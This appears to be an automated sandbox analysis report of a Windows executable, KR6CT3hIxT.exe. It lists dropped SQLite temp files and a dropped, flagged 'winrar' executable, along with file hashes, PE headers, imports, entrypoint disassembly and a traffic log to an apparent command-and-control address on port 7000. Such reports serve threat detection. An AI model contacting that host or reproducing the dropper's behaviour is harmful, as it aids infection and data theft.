Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp98C8.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\r.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpCE50.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\r.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpCE61.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\r.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpCE72.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\r.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpCE82.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\r.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpCEB2.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\r.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpCEC3.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\r.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpF502.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\r.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\winrar-x64-701.exe

Download File

Process:	C:\Users\user\Desktop\KR6CT3hIxT.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	3948120
Entropy (8bit):	7.955285356381258
Encrypted:	false
SSDEEP:	98304:6NRBOBfKgQIm9EOTqw8vjh9Ac9nUNupK4hVvcF+yHrAr:sR/gmeOqv7Ac9F0kB
MD5:	46C17C999744470B689331F41EAB7DF1
SHA1:	B8A63127DF6A87D333061C622220D6D70ED80F7C
SHA-256:	C5B5DEF1C8882B702B6B25CBD94461C737BC151366D2D9EBA5006C04886BFC9A
SHA-512:	4B02A3E85B699F62DF1B4FE752C4DEE08CFABC9B8BB316BC39B854BD5187FC602943A95788EC680C7D3DC2C26AD882E69C0740294BD6CB3B32CDCD165A9441B6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u...u...u...v...u...p.P.u.J.....u.J.q...u.J.v...u.J.p...u...q...u...s...u...t...u...t...u.D.\|...u.D.u...u.D.....u.D.w...u.Rich..u.........................PE..d...6.@f.........."....!.".....................@.............................@......>.<...`.........................................PO..4....O..P........`...`...?....<..(...0..D...@...T.......................(....M..@............@......,A.......................text...~!.......".................. ..`.rdata... ...@..."...&..............@..@.data........p.......H..............@....pdata...?...`...@...Z..............@..@.didat..8...........................@..._RDATA..\...........................@..@.rsrc....p.......b..................@..@.reloc..D....0......................@..B................................................................................................................................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.984223784155051
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	KR6CT3hIxT.exe
File size:	7'616'416 bytes
MD5:	5c95d5493dda877b228a6485a6d40d9c
SHA1:	185482dabc06787f6ce14c6cd46c17372a1b77ae
SHA256:	fdb5b2a0041b0939552ecd31e382e28529313c8bc8a656eb7de1cef9fbd6eee9
SHA512:	05334c39be051eb33c0ad4787cd8d56a1386115bf809f2ec44088f719ab5bf3caf8e7a4539cb5d10b60bc5452b98d01656332b7e5c608038aeae73bd88b16e24
SSDEEP:	196608:0qw9h20Qu0lFIutULgNr8cQ6P/qrFfDG2HD14LDsYu67ReBR:w2FIutULgS7rlDvDSI6cz
TLSH:	F6763316E7A518F9E1BBE938CD624E02F7B17C5E0370978F1291616A1F6B3D08E39712
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$.2.`.\.`.\.`.\..y..h.\..y....\..y..m.\.....b.\...X.r.\..._.j.\...Y.Y.\.i...i.\.i...b.\.i...g.\.`.].C.\...Y.R.\...\.a.\.....a.\

File Icon


Icon Hash:	1515d4d4442f2d2d

Static PE Info

General

Entrypoint:	0x140032ee0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x66409723 [Sun May 12 10:17:07 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	2
File Version Major:	5
File Version Minor:	2
Subsystem Version Major:	5
Subsystem Version Minor:	2
Import Hash:	b1c5b1beabd90d9fdabd1df0779ea832

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007FDD48C5D308h
dec eax
add esp, 28h
jmp 00007FDD48C5CC9Fh
int3
int3
dec eax
mov eax, esp
dec eax
mov dword ptr [eax+08h], ebx
dec eax
mov dword ptr [eax+10h], ebp
dec eax
mov dword ptr [eax+18h], esi
dec eax
mov dword ptr [eax+20h], edi
inc ecx
push esi
dec eax
sub esp, 20h
dec ebp
mov edx, dword ptr [ecx+38h]
dec eax
mov esi, edx
dec ebp
mov esi, eax
dec eax
mov ebp, ecx
dec ecx
mov edx, ecx
dec eax
mov ecx, esi
dec ecx
mov edi, ecx
inc ecx
mov ebx, dword ptr [edx]
dec eax
shl ebx, 04h
dec ecx
add ebx, edx
dec esp
lea eax, dword ptr [ebx+04h]
call 00007FDD48C5C123h
mov eax, dword ptr [ebp+04h]
and al, 66h
neg al
mov eax, 00000001h
sbb edx, edx
neg edx
add edx, eax
test dword ptr [ebx+04h], edx
je 00007FDD48C5CE33h
dec esp
mov ecx, edi
dec ebp
mov eax, esi
dec eax
mov edx, esi
dec eax
mov ecx, ebp
call 00007FDD48C5EE47h
dec eax
mov ebx, dword ptr [esp+30h]
dec eax
mov ebp, dword ptr [esp+38h]
dec eax
mov esi, dword ptr [esp+40h]
dec eax
mov edi, dword ptr [esp+48h]
dec eax
add esp, 20h
inc ecx
pop esi
ret
int3
int3
int3
dec eax
sub esp, 48h
dec eax
lea ecx, dword ptr [esp+20h]
call 00007FDD48C4B6B3h
dec eax
lea edx, dword ptr [00025747h]
dec eax
lea ecx, dword ptr [esp+20h]
call 00007FDD48C5DF02h
int3
jmp 00007FDD48C640E4h
int3
int3
int3
int3
int3
int3

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x597a0	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x597d4	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x70000	0xe360	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x6a000	0x306c	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7f000	0x970	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x536c0	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x53780	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x4b3f0	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x48000	0x508	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x588bc	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4676e	0x46800	f06bb06e02377ae8b223122e53be35c2	False	0.5372340425531915	data	6.47079645411382	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x48000	0x128c4	0x12a00	2de06d4a6920a6911e64ff20000ea72f	False	0.4499003775167785	data	5.273999097784603	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x5b000	0xe75c	0x1a00	0dbdb901a7d477980097e42e511a94fb	False	0.28275240384615385	data	3.2571023907881185	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x6a000	0x306c	0x3200	b0ce0f057741ad2a4ef4717079fa34e9	False	0.483359375	data	5.501810413666288	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.didat	0x6e000	0x360	0x400	1fcc7b1d7a02443319f8fcc2be4ca936	False	0.2578125	data	3.0459938492946015	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
_RDATA	0x6f000	0x15c	0x200	3f331ec50f09ba861beaf955b33712d5	False	0.408203125	data	3.3356393424384843	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x70000	0xe360	0xe400	ada5628b9441c3d4f775b5c1be0267ef	False	0.630139802631579	data	6.596650704309685	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x7f000	0x970	0xa00	77a9ddfc47a5650d6eebbcc823e39532	False	0.52421875	data	5.336289720085303	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
PNG	0x70680	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	English	United States	1.0027729636048528
PNG	0x711c8	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	English	United States	0.9363390441839495
RT_ICON	0x72778	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.47832369942196534
RT_ICON	0x72ce0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.5410649819494585
RT_ICON	0x73588	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.4933368869936034
RT_ICON	0x74430	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m	English	United States	0.5390070921985816
RT_ICON	0x74898	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m	English	United States	0.41393058161350843
RT_ICON	0x75940	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m	English	United States	0.3479253112033195
RT_ICON	0x77ee8	0x3d71	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9809269502193401
RT_DIALOG	0x7c5b8	0x286	data	English	United States	0.5092879256965944
RT_DIALOG	0x7c388	0x13a	data	English	United States	0.60828025477707
RT_DIALOG	0x7c4c8	0xec	data	English	United States	0.6991525423728814
RT_DIALOG	0x7c258	0x12e	data	English	United States	0.5927152317880795
RT_DIALOG	0x7bf20	0x338	data	English	United States	0.45145631067961167
RT_DIALOG	0x7bcc8	0x252	data	English	United States	0.5757575757575758
RT_STRING	0x7cf98	0x1e2	data	English	United States	0.3900414937759336
RT_STRING	0x7d180	0x1cc	data	English	United States	0.4282608695652174
RT_STRING	0x7d350	0x1b8	data	English	United States	0.45681818181818185
RT_STRING	0x7d508	0x146	data	English	United States	0.5153374233128835
RT_STRING	0x7d650	0x46c	data	English	United States	0.3454063604240283
RT_STRING	0x7dac0	0x166	data	English	United States	0.49162011173184356
RT_STRING	0x7dc28	0x152	data	English	United States	0.5059171597633136
RT_STRING	0x7dd80	0x10a	data	English	United States	0.49624060150375937
RT_STRING	0x7de90	0xbc	data	English	United States	0.6329787234042553
RT_STRING	0x7df50	0x1c0	data	English	United States	0.5178571428571429
RT_STRING	0x7e110	0x250	data	English	United States	0.44256756756756754
RT_GROUP_ICON	0x7bc60	0x68	data	English	United States	0.7019230769230769
RT_MANIFEST	0x7c840	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3957333333333333

Imports

DLL	Import
KERNEL32.dll	LocalFree, GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, CreateDirectoryW, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, GlobalMemoryStatusEx, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, IsValidCodePage, FindNextFileA, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, WaitForSingleObjectEx, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlPcToFileHeader, RtlUnwindEx, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, HeapReAlloc, LCMapStringW, FindFirstFileExA
OLEAUT32.dll	SysAllocString, SysFreeString, VariantClear
gdiplus.dll	GdipCloneImage, GdipFree, GdipDisposeImage, GdipCreateBitmapFromStream, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipAlloc

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 26, 2024 01:21:20.055579901 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:20.060955048 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:20.061059952 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:20.182399988 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:20.187380075 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.750159025 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.750458956 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.750530005 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:23.751024008 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.751614094 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.751631021 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.751683950 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:23.752816916 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.753415108 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.753433943 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.753485918 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:23.753487110 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:23.754565001 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.755531073 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.755660057 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.755718946 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:23.760694027 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.760869026 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:23.778717995 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.778943062 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:23.870124102 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.870372057 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.870537043 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:23.870980024 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.870995045 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.871069908 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:23.872159004 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.872174978 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.872313023 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:23.873393059 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.873408079 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.873423100 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.873481989 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:23.874552011 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.874567986 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.874707937 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:23.875742912 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.875765085 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.876086950 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:23.876956940 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.876971960 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.877012968 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:23.878129959 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.878145933 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.879283905 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.879298925 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.879312992 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.879322052 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:23.879357100 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:23.879390001 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:23.880188942 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.925121069 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:23.966722012 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.971451044 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.971764088 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:23.991662979 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.992011070 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:23.992558002 CEST	7000	49730	195.2.75.12	192.168.2.4
